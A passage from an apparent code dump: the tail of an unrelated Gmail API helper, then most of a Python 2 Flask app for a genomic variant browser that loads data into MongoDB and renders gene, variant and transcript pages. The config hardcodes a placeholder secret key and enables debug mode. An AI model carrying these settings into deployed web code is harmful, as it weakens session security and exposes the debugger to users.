(could be the primary account).
user_id: The user ID of the authenticated user the account the
alias is for (default "me").
Returns:
The dict of alias info associated with the account.
"""
req = self.service.users().settings().sendAs().get(
sendAsEmail=send_as_email, userId=user_id)
res = req.execute()
return res
|
exac.py | import itertools
import json
import os
import pymongo
import pysam
import gzip
from parsing import *
import logging
import lookups
import random
import sys
from utils import *
from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash, jsonify, send_from_directory
from flask.ext.compress import Compress
from flask.ext.runner import Runner
from flask_errormail import mail_on_500
from flask import Response
from collections import defaultdict, OrderedDict
from werkzeug.contrib.cache import SimpleCache
from multiprocessing import Process
import glob
import sqlite3
import traceback
import time
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger().setLevel(logging.INFO)
ADMINISTRATORS = (
'exac.browser.errors@gmail.com',
)
app = Flask(__name__)
mail_on_500(app, ADMINISTRATORS)
Compress(app)
app.config['COMPRESS_DEBUG'] = True
cache = SimpleCache()
EXAC_FILES_DIRECTORY = '../exac_data/'
REGION_LIMIT = 1E5
EXON_PADDING = 50
# Load default config and override config from an environment variable
app.config.update(dict(
DB_HOST='localhost',
DB_PORT=27017,
DB_NAME='exac',
DEBUG=True,
SECRET_KEY='development key',
LOAD_DB_PARALLEL_PROCESSES = 4, # contigs assigned to threads, so good to make this a factor of 24 (eg. 2,3,4,6,8)
SITES_VCFS=glob.glob(os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'ExAC*.vcf.gz')),
GENCODE_GTF=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'gencode.gtf.gz'),
CANONICAL_TRANSCRIPT_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'canonical_transcripts.txt.gz'),
OMIM_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'omim_info.txt.gz'),
BASE_COVERAGE_FILES=glob.glob(os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'coverage', 'Panel.*.coverage.txt.gz')),
DBNSFP_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'dbNSFP2.6_gene.gz'),
CONSTRAINT_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'forweb_cleaned_exac_r03_march16_z_data_pLI_CNV-final.txt.gz'),
MNP_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'MNPs_NotFiltered_ForBrowserRelease.txt.gz'),
CNV_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'exac-gencode-exon.cnt.final.pop3'),
CNV_GENE_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'exac-final-cnvs.gene.rank'),
# How to get a dbsnp142.txt.bgz file:
# wget ftp://ftp.ncbi.nlm.nih.gov/snp/organisms/human_9606_b142_GRCh37p13/database/organism_data/b142_SNPChrPosOnRef_105.bcp.gz
# zcat b142_SNPChrPosOnRef_105.bcp.gz | awk '$3 != ""' | perl -pi -e 's/ +/\t/g' | sort -k2,2 -k3,3n | bgzip -c > dbsnp142.txt.bgz
# tabix -s 2 -b 3 -e 3 dbsnp142.txt.bgz
DBSNP_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'dbsnp142.txt.bgz'),
READ_VIZ_DIR="/mongo/readviz"
))
GENE_CACHE_DIR = os.path.join(os.path.dirname(__file__), 'gene_cache')
GENES_TO_CACHE = {l.strip('\n') for l in open(os.path.join(os.path.dirname(__file__), 'genes_to_cache.txt'))}
def connect_db():
    """Open a MongoDB client from the Flask app config and return the configured database handle."""
    host = app.config['DB_HOST']
    port = app.config['DB_PORT']
    client = pymongo.MongoClient(host=host, port=port)
    return client[app.config['DB_NAME']]
def parse_tabix_file_subset(tabix_filenames, subset_i, subset_n, record_parser):
    """
    Returns a generator of parsed record objects (as returned by record_parser) for the i'th out n subset of records
    across all the given tabix_file(s). The records are split by files and contigs within files, with 1/n of all contigs
    from all files being assigned to this the i'th subset.

    Args:
        tabix_filenames: a list of one or more tabix-indexed files. These will be opened using pysam.Tabixfile
        subset_i: zero-based number
        subset_n: total number of subsets
        record_parser: a function that takes a file-like object and returns a generator of parsed records
    """
    start_time = time.time()
    open_tabix_files = [pysam.Tabixfile(tabix_filename) for tabix_filename in tabix_filenames]
    # Flatten to (file, contig) pairs so contigs can be dealt out round-robin across subsets.
    tabix_file_contig_pairs = [(tabix_file, contig) for tabix_file in open_tabix_files for contig in tabix_file.contigs]
    tabix_file_contig_subset = tabix_file_contig_pairs[subset_i : : subset_n]  # get every n'th tabix_file/contig pair
    short_filenames = ", ".join(map(os.path.basename, tabix_filenames))
    num_file_contig_pairs = len(tabix_file_contig_subset)
    print(("Loading subset %(subset_i)s of %(subset_n)s total: %(num_file_contig_pairs)s contigs from "
           "%(short_filenames)s") % locals())
    counter = 0
    for tabix_file, contig in tabix_file_contig_subset:
        header_iterator = tabix_file.header
        # 10**9 as the end coordinate effectively means "to the end of the contig".
        records_iterator = tabix_file.fetch(contig, 0, 10**9, multiple_iterators=True)
        # Chain the header in front so record_parser sees a complete file-like stream.
        for parsed_record in record_parser(itertools.chain(header_iterator, records_iterator)):
            counter += 1
            yield parsed_record
            # Periodic progress logging.
            if counter % 100000 == 0:
                seconds_elapsed = int(time.time()-start_time)
                print(("Loaded %(counter)s records from subset %(subset_i)s of %(subset_n)s from %(short_filenames)s "
                       "(%(seconds_elapsed)s seconds)") % locals())
    print("Finished loading subset %(subset_i)s from %(short_filenames)s (%(counter)s records)" % locals())
def load_base_coverage():
    """Drop and reload db.base_coverage from the configured coverage files using
    parallel worker processes. Returns the started Process objects (caller joins)."""
    def load_coverage(coverage_files, i, n, db):
        # Worker: insert the i'th of n subsets of coverage records.
        coverage_generator = parse_tabix_file_subset(coverage_files, i, n, get_base_coverage_from_file)
        try:
            db.base_coverage.insert(coverage_generator, w=0)
        except pymongo.errors.InvalidOperation:
            pass  # handle error when coverage_generator is empty

    db = get_db()
    db.base_coverage.drop()
    print("Dropped db.base_coverage")
    # load coverage first; variant info will depend on coverage
    db.base_coverage.ensure_index('xpos')
    procs = []
    coverage_files = app.config['BASE_COVERAGE_FILES']
    num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
    # NOTE(review): this shuffles the same list object already bound to
    # coverage_files above -- presumably to balance work across workers; confirm.
    random.shuffle(app.config['BASE_COVERAGE_FILES'])
    for i in range(num_procs):
        p = Process(target=load_coverage, args=(coverage_files, i, num_procs, db))
        p.start()
        procs.append(p)
    return procs
    #print 'Done loading coverage. Took %s seconds' % int(time.time() - start_time)
def load_variants_file():
    """Drop and reload db.variants from the single configured sites VCF using
    parallel worker processes. Returns the started Process objects (caller joins)."""
    def load_variants(sites_file, i, n, db):
        # Worker: insert the i'th of n subsets of variant records.
        variants_generator = parse_tabix_file_subset([sites_file], i, n, get_variants_from_sites_vcf)
        try:
            db.variants.insert(variants_generator, w=0)
        except pymongo.errors.InvalidOperation:
            pass  # handle error when variant_generator is empty

    db = get_db()
    db.variants.drop()
    print("Dropped db.variants")
    # grab variants from sites VCF
    db.variants.ensure_index('xpos')
    db.variants.ensure_index('xstart')
    db.variants.ensure_index('xstop')
    db.variants.ensure_index('rsid')
    db.variants.ensure_index('genes')
    db.variants.ensure_index('transcripts')
    # Exactly one sites VCF must be present.
    sites_vcfs = app.config['SITES_VCFS']
    if len(sites_vcfs) == 0:
        raise IOError("No vcf file found")
    elif len(sites_vcfs) > 1:
        raise Exception("More than one sites vcf file found: %s" % sites_vcfs)
    procs = []
    num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
    for i in range(num_procs):
        p = Process(target=load_variants, args=(sites_vcfs[0], i, num_procs, db))
        p.start()
        procs.append(p)
    return procs
    #print 'Done loading variants. Took %s seconds' % int(time.time() - start_time)
def load_constraint_information():
    """Drop and reload db.constraint from the gzipped constraint file, then index by transcript."""
    db = get_db()
    db.constraint.drop()
    print 'Dropped db.constraint.'
    start_time = time.time()
    with gzip.open(app.config['CONSTRAINT_FILE']) as constraint_file:
        for transcript in get_constraint_information(constraint_file):
            db.constraint.insert(transcript, w=0)
    db.constraint.ensure_index('transcript')
    print 'Done loading constraint info. Took %s seconds' % int(time.time() - start_time)
def load_mnps():
    """Clear any existing per-variant MNP annotations, then re-attach MNP data from MNP_FILE."""
    db = get_db()
    start_time = time.time()
    db.variants.ensure_index('has_mnp')
    print 'Done indexing.'
    # Strip previous MNP annotations; find_and_modify updates one document per
    # call, so loop until no flagged variants remain.
    while db.variants.find_and_modify({'has_mnp' : True}, {'$unset': {'has_mnp': '', 'mnps': ''}}):
        pass
    print 'Deleted MNP data.'
    with gzip.open(app.config['MNP_FILE']) as mnp_file:
        for mnp in get_mnp_data(mnp_file):
            variant = lookups.get_raw_variant(db, mnp['xpos'], mnp['ref'], mnp['alt'], True)
            db.variants.find_and_modify({'_id': variant['_id']}, {'$set': {'has_mnp': True}, '$push': {'mnps': mnp}}, w=0)
    db.variants.ensure_index('has_mnp')
    print 'Done loading MNP info. Took %s seconds' % int(time.time() - start_time)
def load_gene_models():
    """
    Drop and reload db.genes, db.transcripts and db.exons from the GENCODE GTF,
    annotating each gene with canonical-transcript, OMIM and dbNSFP metadata.
    Returns [] so it composes with the process-returning loaders in load_db().
    """
    db = get_db()
    db.genes.drop()
    db.transcripts.drop()
    db.exons.drop()
    print 'Dropped db.genes, db.transcripts, and db.exons.'
    start_time = time.time()
    # Side tables keyed by gene id, merged into gene documents below.
    canonical_transcripts = {}
    with gzip.open(app.config['CANONICAL_TRANSCRIPT_FILE']) as canonical_transcript_file:
        for gene, transcript in get_canonical_transcripts(canonical_transcript_file):
            canonical_transcripts[gene] = transcript
    omim_annotations = {}
    with gzip.open(app.config['OMIM_FILE']) as omim_file:
        for fields in get_omim_associations(omim_file):
            if fields is None:
                continue
            gene, transcript, accession, description = fields
            omim_annotations[gene] = (accession, description)
    dbnsfp_info = {}
    with gzip.open(app.config['DBNSFP_FILE']) as dbnsfp_file:
        for dbnsfp_gene in get_dbnsfp_info(dbnsfp_file):
            other_names = [other_name.upper() for other_name in dbnsfp_gene['gene_other_names']]
            dbnsfp_info[dbnsfp_gene['ensembl_gene']] = (dbnsfp_gene['gene_full_name'], other_names)
    print 'Done loading metadata. Took %s seconds' % int(time.time() - start_time)
    # grab genes from GTF
    start_time = time.time()
    with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
        for gene in get_genes_from_gencode_gtf(gtf_file):
            gene_id = gene['gene_id']
            if gene_id in canonical_transcripts:
                gene['canonical_transcript'] = canonical_transcripts[gene_id]
            if gene_id in omim_annotations:
                gene['omim_accession'] = omim_annotations[gene_id][0]
                gene['omim_description'] = omim_annotations[gene_id][1]
            if gene_id in dbnsfp_info:
                gene['full_gene_name'] = dbnsfp_info[gene_id][0]
                gene['other_names'] = dbnsfp_info[gene_id][1]
            db.genes.insert(gene, w=0)
    print 'Done loading genes. Took %s seconds' % int(time.time() - start_time)
    start_time = time.time()
    db.genes.ensure_index('gene_id')
    db.genes.ensure_index('gene_name_upper')
    db.genes.ensure_index('gene_name')
    db.genes.ensure_index('other_names')
    db.genes.ensure_index('xstart')
    db.genes.ensure_index('xstop')
    print 'Done indexing gene table. Took %s seconds' % int(time.time() - start_time)
    # and now transcripts
    start_time = time.time()
    with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
        db.transcripts.insert((transcript for transcript in get_transcripts_from_gencode_gtf(gtf_file)), w=0)
    print 'Done loading transcripts. Took %s seconds' % int(time.time() - start_time)
    start_time = time.time()
    db.transcripts.ensure_index('transcript_id')
    db.transcripts.ensure_index('gene_id')
    print 'Done indexing transcript table. Took %s seconds' % int(time.time() - start_time)
    # Building up gene definitions
    start_time = time.time()
    with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
        db.exons.insert((exon for exon in get_exons_from_gencode_gtf(gtf_file)), w=0)
    print 'Done loading exons. Took %s seconds' % int(time.time() - start_time)
    start_time = time.time()
    db.exons.ensure_index('exon_id')
    db.exons.ensure_index('transcript_id')
    db.exons.ensure_index('gene_id')
    print 'Done indexing exon table. Took %s seconds' % int(time.time() - start_time)
    return []
def load_cnv_models():
    """Drop and reload db.cnvs from the plain-text CNV file."""
    db = get_db()
    db.cnvs.drop()
    print 'Dropped db.cnvs.'
    start_time = time.time()
    with open(app.config['CNV_FILE']) as cnv_txt_file:
        for cnv in get_cnvs_from_txt(cnv_txt_file):
            db.cnvs.insert(cnv, w=0)
            #progress.update(gtf_file.fileobj.tell())
        #progress.finish()
    print 'Done loading CNVs. Took %s seconds' % int(time.time() - start_time)
def drop_cnv_genes():
    """Drop the db.cnvgenes collection (cleanup step before load_cnv_genes repopulates it)."""
    db = get_db()
    # Removed an unused `start_time = time.time()` local -- nothing here is timed.
    db.cnvgenes.drop()
def load_cnv_genes():
    """Load per-gene CNV records from CNV_GENE_FILE into db.cnvgenes.
    Does not drop first -- see drop_cnv_genes()."""
    db = get_db()
    start_time = time.time()
    with open(app.config['CNV_GENE_FILE']) as cnv_gene_file:
        for cnvgene in get_cnvs_per_gene(cnv_gene_file):
            db.cnvgenes.insert(cnvgene, w=0)
            #progress.update(gtf_file.fileobj.tell())
        #progress.finish()
    print 'Done loading CNVs in genes. Took %s seconds' % int(time.time() - start_time)
def load_dbsnp_file():
    """
    Drop and reload db.dbsnp from DBSNP_FILE, then index by rsid and xpos.

    Uses parallel worker processes when a tabix index (.tbi) is present;
    otherwise falls back to a single-threaded load of the plain gzipped file.
    Returns the list of started Process objects (caller joins them).
    """
    db = get_db()

    def load_dbsnp(dbsnp_file, i, n, db):
        # Worker: insert the i'th of n subsets of dbsnp records.
        if os.path.isfile(dbsnp_file + ".tbi"):
            dbsnp_record_generator = parse_tabix_file_subset([dbsnp_file], i, n, get_snp_from_dbsnp_file)
            try:
                db.dbsnp.insert(dbsnp_record_generator, w=0)
            except pymongo.errors.InvalidOperation:
                pass  # handle error when coverage_generator is empty
        else:
            with gzip.open(dbsnp_file) as f:
                db.dbsnp.insert((snp for snp in get_snp_from_dbsnp_file(f)), w=0)

    db.dbsnp.drop()
    db.dbsnp.ensure_index('rsid')
    db.dbsnp.ensure_index('xpos')
    start_time = time.time()
    dbsnp_file = app.config['DBSNP_FILE']
    print("Loading dbsnp from %s" % dbsnp_file)
    if os.path.isfile(dbsnp_file + ".tbi"):
        num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
    else:
        # see if non-tabixed .gz version exists
        if os.path.isfile(dbsnp_file):
            print(("WARNING: %(dbsnp_file)s.tbi index file not found. Will use single thread to load dbsnp."
                   "To create a tabix-indexed dbsnp file based on UCSC dbsnp, do: \n"
                   "   wget http://hgdownload.soe.ucsc.edu/goldenPath/hg19/database/snp141.txt.gz \n"
                   "   gzcat snp141.txt.gz | cut -f 1-5 | bgzip -c > snp141.txt.bgz \n"
                   "   tabix -0 -s 2 -b 3 -e 4 snp141.txt.bgz") % locals())
            num_procs = 1
        else:
            # BUG FIX: the format string was "%s(dbsnp_file)s", which interpolated
            # the entire locals() dict instead of the missing filename.
            raise Exception("dbsnp file %(dbsnp_file)s not found." % locals())

    procs = []
    for i in range(num_procs):
        p = Process(target=load_dbsnp, args=(dbsnp_file, i, num_procs, db))
        p.start()
        procs.append(p)
    return procs

    #print 'Done loading dbSNP. Took %s seconds' % int(time.time() - start_time)
    #start_time = time.time()
    #db.dbsnp.ensure_index('rsid')
    #print 'Done indexing dbSNP table. Took %s seconds' % int(time.time() - start_time)
def load_db():
    """
    Drop and reload the entire database, then rebuild derived data.

    Prompts for confirmation, fans each loader's work out to worker processes,
    joins them all, then loads MNPs and regenerates the page cache.
    """
    # Initialize database
    # Don't need to explicitly create tables with mongo, just indices
    confirm = raw_input('This will drop the database and reload. Are you sure you want to continue? [no] ')
    if not confirm.startswith('y'):
        print('Exiting...')
        sys.exit(1)
    all_procs = []
    for load_function in [load_variants_file, load_dbsnp_file, load_base_coverage, load_gene_models, load_constraint_information, load_cnv_models, load_cnv_genes]:
        # BUG FIX: some loaders (e.g. load_constraint_information, load_cnv_models)
        # run synchronously and return None; treat that as "no worker processes"
        # instead of crashing on all_procs.extend(None).
        procs = load_function() or []
        all_procs.extend(procs)
        print("Started %s processes to run %s" % (len(procs), load_function.__name__))
    # Wait for every worker process before the dependent post-processing steps.
    for p in all_procs:
        p.join()
    print('Done! Loading MNPs...')
    load_mnps()
    print('Done! Creating cache...')
    create_cache()
    print('Done!')
def create_cache():
    """
    This is essentially a compile step that generates all cached resources.
    Creates files like autocomplete_strings.txt
    Should be run on every redeploy.
    """
    # create autocomplete_strings.txt
    autocomplete_strings = []
    for gene in get_db().genes.find():
        autocomplete_strings.append(gene['gene_name'])
        if 'other_names' in gene:
            autocomplete_strings.extend(gene['other_names'])
    # `with` guarantees the file is flushed and closed even if a write fails
    # (the original leaked the handle on exceptions).
    with open(os.path.join(os.path.dirname(__file__), 'autocomplete_strings.txt'), 'w') as f:
        for s in sorted(autocomplete_strings):
            f.write(s+'\n')

    # create static gene pages for genes in
    if not os.path.exists(GENE_CACHE_DIR):
        os.makedirs(GENE_CACHE_DIR)

    # get list of genes ordered by num_variants
    for gene_id in GENES_TO_CACHE:
        try:
            page_content = get_gene_page_content(gene_id)
        except Exception as e:
            # Best-effort: log the failure and keep caching the remaining genes.
            print(e)
            continue
        with open(os.path.join(GENE_CACHE_DIR, '{}.html'.format(gene_id)), 'w') as f:
            f.write(page_content)
def precalculate_metrics():
    """
    Pre-compute histograms of site quality metrics across all variants and
    store them in db.metrics for the variant-page plots.
    """
    import numpy
    db = get_db()
    print 'Reading %s variants...' % db.variants.count()
    metrics = defaultdict(list)
    binned_metrics = defaultdict(list)
    progress = 0
    start_time = time.time()
    for variant in db.variants.find(fields=['quality_metrics', 'site_quality', 'allele_num', 'allele_count']):
        for metric, value in variant['quality_metrics'].iteritems():
            metrics[metric].append(float(value))
        qual = float(variant['site_quality'])
        metrics['site_quality'].append(qual)
        if variant['allele_num'] == 0: continue
        # Bucket site quality by allele count / frequency.
        if variant['allele_count'] == 1:
            binned_metrics['singleton'].append(qual)
        elif variant['allele_count'] == 2:
            binned_metrics['doubleton'].append(qual)
        else:
            for af in AF_BUCKETS:
                if float(variant['allele_count'])/variant['allele_num'] < af:
                    binned_metrics[af].append(qual)
                    break
        progress += 1
        if not progress % 100000:
            print 'Read %s variants. Took %s seconds' % (progress, int(time.time() - start_time))
    print 'Done reading variants. Dropping metrics database... '
    db.metrics.drop()
    print 'Dropped metrics database. Calculating metrics...'
    for metric in metrics:
        bin_range = None
        # DP spans orders of magnitude, so histogram it in log space.
        data = map(numpy.log, metrics[metric]) if metric == 'DP' else metrics[metric]
        if metric == 'FS':
            bin_range = (0, 20)
        elif metric == 'VQSLOD':
            bin_range = (-20, 20)
        elif metric == 'InbreedingCoeff':
            bin_range = (0, 1)
        if bin_range is not None:
            # Clamp outliers into the fixed range so they land in the edge bins.
            data = [x if (x > bin_range[0]) else bin_range[0] for x in data]
            data = [x if (x < bin_range[1]) else bin_range[1] for x in data]
        hist = numpy.histogram(data, bins=40, range=bin_range)
        edges = hist[1]
        # mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
        # Stored under 'mids' but these are the left bin edges.
        lefts = [edges[i] for i in range(len(edges)-1)]
        db.metrics.insert({
            'metric': metric,
            'mids': lefts,
            'hist': list(hist[0])
        })
    for metric in binned_metrics:
        # Frequency-binned quality is always histogrammed in log space.
        hist = numpy.histogram(map(numpy.log, binned_metrics[metric]), bins=40)
        edges = hist[1]
        mids = [(edges[i]+edges[i+1])/2 for i in range(len(edges)-1)]
        db.metrics.insert({
            'metric': 'binned_%s' % metric,
            'mids': mids,
            'hist': list(hist[0])
        })
    db.metrics.ensure_index('metric')
    print 'Done pre-calculating metrics!'
def get_db():
    """
    Opens a new database connection if there is none yet for the
    current application context, and returns it.
    """
    if hasattr(g, 'db_conn'):
        return g.db_conn
    g.db_conn = connect_db()
    return g.db_conn
# @app.teardown_appcontext
# def close_db(error):
# """Closes the database again at the end of the request."""
# if hasattr(g, 'db_conn'):
# g.db_conn.close()
@app.route('/')
def homepage():
    """Render the site landing page."""
    return render_template('homepage.html')
@app.route('/autocomplete/<query>')
def awesome_autocomplete(query):
    """Return JSON autocomplete suggestions for the search box."""
    if not hasattr(g, 'autocomplete_strings'):
        # Lazily load the deploy-time autocomplete list once per app context;
        # `with` closes the file handle the original left to the GC.
        with open(os.path.join(os.path.dirname(__file__), 'autocomplete_strings.txt')) as f:
            g.autocomplete_strings = [s.strip() for s in f]
    suggestions = lookups.get_awesomebar_suggestions(g, query)
    return Response(json.dumps([{'value': s} for s in suggestions]), mimetype='application/json')
@app.route('/awesome')
def awesome():
    """Resolve the free-text search query and redirect to the matching entity page."""
    db = get_db()
    query = request.args.get('query')
    datatype, identifier = lookups.get_awesomebar_result(db, query)
    print "Searched for %s: %s" % (datatype, identifier)
    if datatype == 'gene':
        return redirect('/gene/{}'.format(identifier))
    elif datatype == 'transcript':
        return redirect('/transcript/{}'.format(identifier))
    elif datatype == 'variant':
        return redirect('/variant/{}'.format(identifier))
    elif datatype == 'region':
        return redirect('/region/{}'.format(identifier))
    elif datatype == 'dbsnp_variant_set':
        return redirect('/dbsnp/{}'.format(identifier))
    elif datatype == 'error':
        return redirect('/error/{}'.format(identifier))
    elif datatype == 'not_found':
        return redirect('/not_found/{}'.format(identifier))
    else:
        # Unknown datatype from lookups; surfaces as a 500.
        raise Exception
@app.route('/variant/<variant_str>')
def variant_page(variant_str):
    """Render the page for a single variant identified as 'chrom-pos-ref-alt'.
    Any failure (bad id, missing data) is reported as a 404."""
    db = get_db()
    try:
        chrom, pos, ref, alt = variant_str.split('-')
        pos = int(pos)
        # pos, ref, alt = get_minimal_representation(pos, ref, alt)
        xpos = get_xpos(chrom, pos)
        variant = lookups.get_variant(db, xpos, ref, alt)
        if variant is None:
            # Unknown variant: still render a page from the parsed coordinates.
            variant = {
                'chrom': chrom,
                'pos': pos,
                'xpos': xpos,
                'ref': ref,
                'alt': alt
            }
        # Group VEP annotations as {major_consequence: {gene: [annotations]}}.
        consequences = OrderedDict()
        if 'vep_annotations' in variant:
            add_consequence_to_variant(variant)
            variant['vep_annotations'] = remove_extraneous_vep_annotations(variant['vep_annotations'])
            variant['vep_annotations'] = order_vep_by_csq(variant['vep_annotations'])  # Adds major_consequence
            for annotation in variant['vep_annotations']:
                annotation['HGVS'] = get_proper_hgvs(annotation)
                consequences.setdefault(annotation['major_consequence'], {}).setdefault(annotation['Gene'], []).append(annotation)
        base_coverage = lookups.get_coverage_for_bases(db, xpos, xpos + len(ref) - 1)
        any_covered = any([x['has_coverage'] for x in base_coverage])
        metrics = lookups.get_metrics(db, variant)

        # check the appropriate sqlite db to get the *expected* number of
        # available bams and *actual* number of available bams for this variant
        sqlite_db_path = os.path.join(
            app.config["READ_VIZ_DIR"],
            "combined_bams",
            chrom,
            "combined_chr%s_%03d.db" % (chrom, pos % 1000))
        logging.info(sqlite_db_path)
        try:
            read_viz_db = sqlite3.connect(sqlite_db_path)
            n_het = read_viz_db.execute("select n_expected_samples, n_available_samples from t "
                "where chrom=? and pos=? and ref=? and alt=? and het_or_hom_or_hemi=?", (chrom, pos, ref, alt, 'het')).fetchone()
            n_hom = read_viz_db.execute("select n_expected_samples, n_available_samples from t "
                "where chrom=? and pos=? and ref=? and alt=? and het_or_hom_or_hemi=?", (chrom, pos, ref, alt, 'hom')).fetchone()
            n_hemi = read_viz_db.execute("select n_expected_samples, n_available_samples from t "
                "where chrom=? and pos=? and ref=? and alt=? and het_or_hom_or_hemi=?", (chrom, pos, ref, alt, 'hemi')).fetchone()
            read_viz_db.close()
        except Exception, e:
            # Missing/broken sqlite db: degrade to "no reads available".
            logging.error("Error when accessing sqlite db: %s - %s", sqlite_db_path, e)
            n_het = n_hom = n_hemi = None
        read_viz_dict = {
            'het': {'n_expected': n_het[0] if n_het is not None and n_het[0] is not None else 0,
                    'n_available': n_het[1] if n_het is not None and n_het[1] is not None else 0,},
            'hom': {'n_expected': n_hom[0] if n_hom is not None and n_hom[0] is not None else 0,
                    'n_available': n_hom[1] if n_hom is not None and n_hom[1] is not None else 0,},
            'hemi': {'n_expected': n_hemi[0] if n_hemi is not None and n_hemi[0] is not None else 0,
                     'n_available': n_hemi[1] if n_hemi is not None and n_hemi[1] is not None else 0,},
        }
        total_available = 0
        total_expected = 0
        for het_or_hom_or_hemi in ('het', 'hom', 'hemi'):
            total_available += read_viz_dict[het_or_hom_or_hemi]['n_available']
            total_expected += read_viz_dict[het_or_hom_or_hemi]['n_expected']
            read_viz_dict[het_or_hom_or_hemi]['readgroups'] = [
                '%(chrom)s-%(pos)s-%(ref)s-%(alt)s_%(het_or_hom_or_hemi)s%(i)s' % locals()
                for i in range(read_viz_dict[het_or_hom_or_hemi]['n_available'])
            ]   #eg. '1-157768000-G-C_hom1',
            read_viz_dict[het_or_hom_or_hemi]['urls'] = [
                # NOTE(review): the same combined .bam url is repeated per readgroup;
                # presumably the readgroup id selects the sample within it -- confirm.
                os.path.join('combined_bams', chrom, 'combined_chr%s_%03d.bam' % (chrom, pos % 1000))
                for i in range(read_viz_dict[het_or_hom_or_hemi]['n_available'])
            ]
        read_viz_dict['total_available'] = total_available
        read_viz_dict['total_expected'] = total_expected
        print 'Rendering variant: %s' % variant_str
        return render_template(
            'variant.html',
            variant=variant,
            base_coverage=base_coverage,
            consequences=consequences,
            any_covered=any_covered,
            metrics=metrics,
            read_viz=read_viz_dict,
        )
    except Exception:
        print 'Failed on variant:', variant_str, ';Error=', traceback.format_exc()
        abort(404)
@app.route('/gene/<gene_id>')
def gene_page(gene_id):
    """Serve a gene page, preferring the static cache pre-rendered by create_cache()."""
    if gene_id in GENES_TO_CACHE:
        # `with` closes the cached-page handle the original left to the GC.
        with open(os.path.join(GENE_CACHE_DIR, '{}.html'.format(gene_id))) as f:
            return f.read()
    else:
        return get_gene_page_content(gene_id)
def get_gene_page_content(gene_id):
    """Render the HTML page for one gene, memoizing the rendered template in the cache.
    Unknown genes and rendering failures become 404s."""
    db = get_db()
    try:
        gene = lookups.get_gene(db, gene_id)
        if gene is None:
            abort(404)
        cache_key = 't-gene-{}'.format(gene_id)
        t = cache.get(cache_key)
        if t is None:
            variants_in_gene = lookups.get_variants_in_gene(db, gene_id)
            transcripts_in_gene = lookups.get_transcripts_in_gene(db, gene_id)
            # Get some canonical transcript and corresponding info
            transcript_id = gene['canonical_transcript']
            transcript = lookups.get_transcript(db, transcript_id)
            variants_in_transcript = lookups.get_variants_in_transcript(db, transcript_id)
            cnvs_in_transcript = lookups.get_exons_cnvs(db, transcript_id)
            cnvs_per_gene = lookups.get_cnvs(db, gene_id)
            coverage_stats = lookups.get_coverage_for_transcript(db, transcript['xstart'] - EXON_PADDING, transcript['xstop'] + EXON_PADDING)
            add_transcript_coordinate_to_variants(db, variants_in_transcript, transcript_id)
            constraint_info = lookups.get_constraint_for_transcript(db, transcript_id)
            t = render_template(
                'gene.html',
                gene=gene,
                transcript=transcript,
                variants_in_gene=variants_in_gene,
                variants_in_transcript=variants_in_transcript,
                transcripts_in_gene=transcripts_in_gene,
                coverage_stats=coverage_stats,
                cnvs = cnvs_in_transcript,
                cnvgenes = cnvs_per_gene,
                constraint=constraint_info
            )
            # NOTE(review): timeout=1000*60 -- if the cache timeout unit is
            # seconds this is ~16.7 hours, not 60s; confirm intended.
            cache.set(cache_key, t, timeout=1000*60)
        print 'Rendering gene: %s' % gene_id
        return t
    except Exception, e:
        print 'Failed on gene:', gene_id, ';Error=', traceback.format_exc()
        abort(404)
@app.route('/transcript/<transcript_id>')
def transcript_page(transcript_id):
    """Render (and cache) the page for a single transcript; failures become 404s."""
    db = get_db()
    try:
        transcript = lookups.get_transcript(db, transcript_id)
        cache_key = 't-transcript-{}'.format(transcript_id)
        t = cache.get(cache_key)
        if t is None:
            gene = lookups.get_gene(db, transcript['gene_id'])
            gene['transcripts'] = lookups.get_transcripts_in_gene(db, transcript['gene_id'])
            variants_in_transcript = lookups.get_variants_in_transcript(db, transcript_id)
            cnvs_in_transcript = lookups.get_exons_cnvs(db, transcript_id)
            cnvs_per_gene = lookups.get_cnvs(db, transcript['gene_id'])
            coverage_stats = lookups.get_coverage_for_transcript(db, transcript['xstart'] - EXON_PADDING, transcript['xstop'] + EXON_PADDING)
            add_transcript_coordinate_to_variants(db, variants_in_transcript, transcript_id)
            # The *_json duplicates feed the client-side JS on the page.
            t = render_template(
                'transcript.html',
                transcript=transcript,
                transcript_json=json.dumps(transcript),
                variants_in_transcript=variants_in_transcript,
                variants_in_transcript_json=json.dumps(variants_in_transcript),
                coverage_stats=coverage_stats,
                coverage_stats_json=json.dumps(coverage_stats),
                gene=gene,
                gene_json=json.dumps(gene),
                cnvs = cnvs_in_transcript,
                cnvs_json=json.dumps(cnvs_in_transcript),
                cnvgenes = cnvs_per_gene,
                cnvgenes_json=json.dumps(cnvs_per_gene)
            )
            cache.set(cache_key, t, timeout=1000*60)
        print 'Rendering transcript: %s' % transcript_id
        return t
    except Exception, e:
        print 'Failed on transcript:', transcript_id, ';Error=', traceback.format_exc()
        abort(404)
@app.route('/region/<region_id>')
def region_page(region_id):
    """Render the page for a genomic region given as 'chrom' or 'chrom-start-stop'."""
    db = get_db()
    try:
        region = region_id.split('-')
        cache_key = 't-region-{}'.format(region_id)
        t = cache.get(cache_key)
        if t is None:
            chrom = region[0]
            start = None
            stop = None
            if len(region) == 3:
                chrom, start, stop = region
                start = int(start)
                stop = int(stop)
            # Refuse unbounded, inverted, or oversized regions: render an empty page.
            if start is None or stop - start > REGION_LIMIT or stop < start:
